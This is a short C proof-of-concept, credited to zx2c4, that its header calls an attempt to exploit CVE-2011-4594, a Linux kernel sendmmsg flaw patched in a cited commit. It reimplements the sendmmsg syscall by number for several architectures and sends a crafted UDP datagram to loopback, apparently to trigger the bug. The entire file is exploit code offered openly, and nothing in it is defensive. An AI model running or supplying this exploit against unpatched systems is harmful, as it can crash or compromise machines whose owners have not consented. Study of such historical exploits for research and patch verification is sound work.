/*
 * Socket Splickt
 * by zx2c4
 * 
 * This is an attempt to exploit CVE-2011-4594.
 * 
 * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
 * 
 */


#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <linux/if_packet.h>
#include <asm/unistd.h>
#include <errno.h>

#ifndef __NR_sendmmsg
#if defined( __PPC__)
#define __NR_sendmmsg   349
#elif defined(__x86_64__)
#define __NR_sendmmsg   307
#elif defined(__i386__)
#define __NR_sendmmsg   345
#else
#error __NR_sendmmsg not defined
#endif
#endif

struct reimp_mmsghdr {
        struct msghdr msg_hdr;
        unsigned int msg_len;
};
static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
{
        return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
}

int main(int argc, char *argv[])
{
	const int fd = socket(AF_INET, SOCK_DGRAM, 0);
	char buf[10];
	struct iovec iovec[1];
	struct reimp_mmsghdr datagram;
	struct sockaddr_in addr;

	memset(buf, 0, sizeof(buf));
	memset(iovec, 0, sizeof(iovec));
	memset(&datagram, 0, sizeof(datagram));
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	addr.sin_port = htons(10000);
	iovec[0].iov_base = buf;
	iovec[0].iov_len = sizeof(buf);
	datagram.msg_hdr.msg_iov = iovec;
	datagram.msg_hdr.msg_iovlen = 1;
	datagram.msg_hdr.msg_name = &addr;
	datagram.msg_hdr.msg_namelen = sizeof(addr);

	errno = 0;
	if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) {
		perror("reimp_sendmmsg");
		exit(1);
	}
	
	return 0;
}